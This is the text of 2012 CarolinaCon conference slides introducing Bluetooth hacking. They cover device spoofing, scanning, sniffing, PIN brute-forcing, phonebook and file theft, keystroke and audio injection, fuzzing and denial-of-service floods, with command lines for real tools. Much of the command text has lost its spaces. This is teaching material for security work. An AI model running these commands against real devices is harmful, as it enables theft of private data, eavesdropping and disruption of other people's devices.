An Introduction to Bluetooth Hacking
JP Dunning (.ronin) CarolinaCon 8
March 11-13, 2012
�Bluetooth
IEEE 802.15.1
Released 1999 Standards controlled by Bluetooth SIG Ideal for use in place of USB, PS/2, Serial, Audio Cables, etc Many of them portable or embedded
Version 1.0 first release
Low Power / Low Data Rate / Short Range
Included in Billions of Devices
�Bluetooth Versions
Version 1.0 1.1 1.2 2.0 2.1 3.0 4.0
Release 1999 2001 2003 2004 2007 2009 2010
Updated Features Initial release Unencrypted options FHSS, Rate 721 Kbs Rate 2.1 Mbs Improved Security AMP adds 24 Mbs rate, 802.11 transport Low Power, Redefining Protocols
�Topology
Star network topology Ad-Hoc (Piconet)
Master / Slave Master controls the network
Sets things like clock cycles
Master can have up to 7 slave devices Slave can only have one Master
Either device can initial pairing
�Security
Authentication
Initial pairing with a PassKey Further authentication with Link Key Traffic encrypted during transit Varying levels of Trust
Encryption
Authorization
�Linux Bluetooth Basics
BlueZ Bluetooth Stack Recommend compile from source with flags to install additional services Some of the Tools
Hciconfig - Configure interface settings Hcitool - Configure connections Blutoothd - Bluetooth Daemon Sdptool - Service discovery Simple-agent - Pairing
�Equipment
Adapter
Parani UD100 Use the same antenna equipment as Wi-Fi Cambridge Silicon Radio (CSR) Version 2.1 (3.0 and 4.0 starting to come out)
Antenna
ChipSet
Version
�Scanning
Scan for devices Discoverable Mode
Device listens for remote Inquiries Device not listening will not respond to scans
# hcitool -i hci0 scan --flush --class BD Address: E0:F8:47:4D:5E:6F [mode 1, clkoffset 0x5585] Device name: Device class: Bob's Laptop [cached] Computer, Laptop (0x3a010c)
�Access Profile
Device Address: unique identifier
Example: 00:11:22:33:44:55 Services: Identifies types of services Major Device Class: High level of device Minor Device Class: More granular Example: Motorola Headset
Class of Device (CoD): 24-bit value
Device Name: Human readable identifier
�Spoofing
Bluetooth Profile:
Device Address, Device Class, Device Name Modify host Bluetooth Adapter profile to match the profile of another device Creating a misleading profile of host Bluetooth Adapter
Bluetooth Profile Cloning:
Bluetooth Profile Spoofing:
�SpoofTooph
Scan local area for devices Save list of devices found Select a device from the list to clone
# spooftooph -i hci0 -s -w scan.log
�SpoofTooph
�War-Nibbling
Kismet has Bluetooth btscan plugin
�War-Nibbling
BTDevice1:BDADDR00:05:4F:00:00:00 Class:0x30040 Name:StreetPilotc550 Seen:1 Manuf:Private First:ThuMay1016:07:502012 Last:ThuMay1016:07:502012 MinPos:Lat35.997002Lon78.909752Alt129.585999Spd0.000000 MaxPos:Lat35.997002Lon78.909752Alt129.585999Spd0.000000 AvgPos:AvgLat35.997002AvgLon78.909752AvgAlt129.585900
�War-Nibbling
�War-Nibbling
�War-Nibbling
�Service Discovery
Service Discovery Protocol (SDP) Lists available services on device
Service name L2CAP port RFCOMM port
Generally available without authentication
�Service Discovery
# sdptool -i hci0 browse xx:xx:xx:xx:xx:xx ... Service Name: File Transfer server Service RecHandle: 0x10000 Service Class ID List: "OBEX File Transfer" (0x1106) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 10 "OBEX" (0x0008) Profile Descriptor List: "OBEX File Transfer" (0x1106) Version: 0x0100
�Port Scan
Find open ports with listening services
Similar to NMAP Scan open L2CAP ports
psm_scan
#psm_scanihci0s1e101xx:xx:xx:xx:xx:xx
rfcomm_scan
Scan open RFCOMM ports
#rfcomm_scanihci0s1e30xx:xx:xx:xx:xx:xx
�CavitySearch
*Tool Release* Streamline the info gathering process Conduct recon for HCI Info, SDP, L2CAP, and RFComm Aggregate into a single log file
�CavitySearch
#cavitysearchhci011:22:33:44:55:66 Gatheringdeviceinfointo11_22_33_44_55_66/hciinfo.log... Gatheringdevicescaninto11_22_33_44_55_66/scan.log... GatheringSDPinto11_22_33_44_55_66/sdp.log... GatheringPSMs1101into11_22_33_44_55_66/psm.log... GatheringRFCOMMs130into11_22_33_44_55_66/rfcomm.log... Generatingprofilein11_22_33_44_55_66/profile.log... Logssavedin11_22_33_44_55_66/directory. ...done.
�Bluetooth Identity
Bluetooth Class
Type of Device
Assist in determining physical device Networking, Telephony, & Object Transfer
List Services
Bluetooth Name
Use human name for Social Engineering Use model name to determine possible attack vectors Devices are assigned address in blocks The same models are within a limited range
Bluetooth Address
�Bluetooth Profiling Project
Bluetooth Profiling Project (BlueProPro) Collect Device Name, Device Address and Device Class on as many devices as possible Same idea as Josh Wright's Bnap,Bnap, but collecting device profiles from others devices instead Collected over 1,500 device profiles so far 1,000 profiles posted as of 07/29/2010
�Bluetooth Profiling Project
Percentage of devices names which disclosed sensitive information (out of the 1,500 profiles collected)
First Name 28.17%
Last Name 18.76%
Location Device Model 1.30% 70.54%
Nickname / Handle 1.51%
�Sniffing
HCIDump
Similar to TCPDump to capture traffic on host
#hcidumpihci0Rwbtdump.cap
Wireshark
View and examine capture
#wiresharkrbtdump.cap
�Wireshark
�Ubertooth
Kismet
Capture portions of Bluetooth traffic Find Bluetooth device in local area Find Bluetooth device in local area Brute force UAP portion of Device Address Spectrum analysis
Bluetooth_RXTX
Spescan
�Ubertooth
�Ubertooth
�Find Non-Discoverable
Previous Contact
Have prier knowledge of the Device Address Some device print the Device Address on the box or casing Scans 248 (232) possible Device Addresses Takes years
Labels
Redfang
�Find Non-Discoverable
Only need LAP and UAP portions of the device address
Ubertooth-lap extracts lap Ubertooth-uap calculates uap
#ubertoothlap
#ubertoothuap
�DEMO
�Pairing
Guess PassKey
Commonly PassKeys are 4 digits
Best chances: 0000, 1234, 9999
#simpleagenthci0xx:xx:xx:xx:xx RequestPinCode(/org/bluez/2/hci0/devxx_xx_xx_xx_xx_xx) EnterPINCode:
�Pairing
Trick User by changing the profile to one the user recognizes Post signs requesting connections as advertizing or local information
�Pairing
Chomp
Bluetooth specification attempts to counteract brute force Attempts different PassKeys Changes Device Address between attempts Provide a file with possible PassKeys
#chompxx:xx:xx:xx:xx:xxpasskeys
�Common Services
File Transfer Profile (FTP) Object Push Profile (OPP) Human Interaction Device (HID) Hands Free (HF) Personal Area Network (PAN)
�OPP
Specific files like phonebooks and calenders
Bluebugger
dump phonebook #bluebuggerc3axx:xx:xx:xx:xx:xxphonebook
Specific tools
Bluesnarfer, btxml, btobex, bloover, helomoto
�FTP
FTP facilitates the exchanging file
Obexfs mounts a remote folder over FTP Interact like files are stored locally
#mkdirbtdir #obexfsbxx:xx:xx:xx:xx:xxc3btdir/ #lsbtdir Passwords.xlsTaxes.pdf
�HID
HID is used for various types of human iteration device such as mice and keyboards. Inject keystrokes by acting as a keyboard Stuffkeys
Keystrokes hard coded Default who controls your keystrokes?
#stuffkeysaxx:xx:xx:xx:xx:xxb yy:yy:yy:yy:yy:yy
�HF
Inject and receive audio Carwhisperer
#hciconfighci0voice0x0060 #carwhispererihci0in.rawout.raw4
HSTest
#hstestrecordin.rawxx:xx:xx:xx:xx:xx4
�PAN
Creates a TCP/IP network over Bluetooth Interact like it is WiFi or Ethernet
#pandconnectxx:xx:xx:xx:xx:xxpersistencrypt role=PANU #ifconfig ... pan0Linkencap:EthernetHWaddryy:yy:yy:yy:yy:yy ...
�Fuzzing
Bluetooth Stack Smasher
Fuzz L2CAP packets Attempts to crash Bluetooth Stack
Generates code for suspected crashes
Takes about half an hour to run
#bssihci0s100m12M0xx:xx:xx:xx:xx:xx
�vCards
Virtual Business Card
Adds information to contacts Sending messages by vCard Set the name field to the message Send a malformed vCard
BlueJacking
Nasty vCard
#ussppushxx:xx:xx:xx:xx:xxnasty.vcfbob.vcf
�DoS
L2Ping Flood
Send a constant flood of ping packets
#l2pingihci0fxx:xx:xx:xx:xx:xx
vCard Flood
Fill up address book with contacts
#vcblasterc100gxx:xx:xx:xx:xx:xx
�PwnTooth
Bundle of Bluetooth attack tools Designed to automate multiple attacks against multiple targets. If a address device is detected in multiple iterations of scans, the attacks listed in the config file are only run the first time
#pwntoothllogfile.txts10
�PwnTooth
�DEMO
�Recap
Setup
Configure interface Gather information on device and services Authenticate or connect to open services
Recon
Connect
Interact
Access resources Test reliability through fuzzing and DoS
Attack
�Q&A
JP Dunning Twitter: r0wnin Email: ronin <At> shadowcave <d0t> org Web: www.hackfromacave.com
